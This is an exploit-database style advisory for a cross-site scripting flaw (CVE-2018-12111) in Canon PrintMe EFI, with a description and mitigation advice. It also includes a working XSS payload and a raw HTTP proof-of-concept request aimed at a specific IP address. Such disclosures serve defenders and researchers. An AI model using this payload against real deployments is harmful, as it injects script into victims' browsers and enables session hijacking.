Canon PrintMe EFI - Cross-Site Scripting

vendor:

PrintMe EFI

by:

Huy Kha

6.1

CVSS

MEDIUM

Cross-Site Scripting

CWE

Product Name: PrintMe EFI

Affected Version From: Canon PrintMe EFI

Affected Version To: Canon PrintMe EFI

Patch Exists: NO

Related CWE: CVE-2018-12111

CPE: a:canon:printme_efi

Metasploit:

Other Scripts:

Platforms Tested: Mozilla FireFox

2018

Canon PrintMe EFI – Cross-Site Scripting

This exploit allows an attacker to inject malicious code into the Canon PrintMe EFI application, leading to a cross-site scripting (XSS) vulnerability. The vulnerability is triggered when the application fails to properly sanitize user input, allowing an attacker to execute arbitrary JavaScript code in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques in the Canon PrintMe EFI application. Additionally, the use of Content Security Policy (CSP) can help prevent the execution of malicious scripts.

Source

Exploit-DB raw data:

# Title: Canon PrintMe EFI - Cross-Site Scripting	 
# Date: 9.6.2018-06-09	 
# Exploit Author: Huy Kha	
# Vendor Homepage: [https://www.efi.com/]  
# Version: Canon PrintMe EFI	
# Tested on: Mozilla FireFox 
# CVE: CVE-2018-12111
# XSS Payload used: '"--!><img src=x onerror=alert("XSS")>
	
# PoC
	
GET /wt3/mydocs.php/'%22--!%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E HTTP/1.1
Host: 129.25.8.177
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a11b2588fe327f6bd1acf79f286c2dcd
Connection: close
Upgrade-Insecure-Requests: 1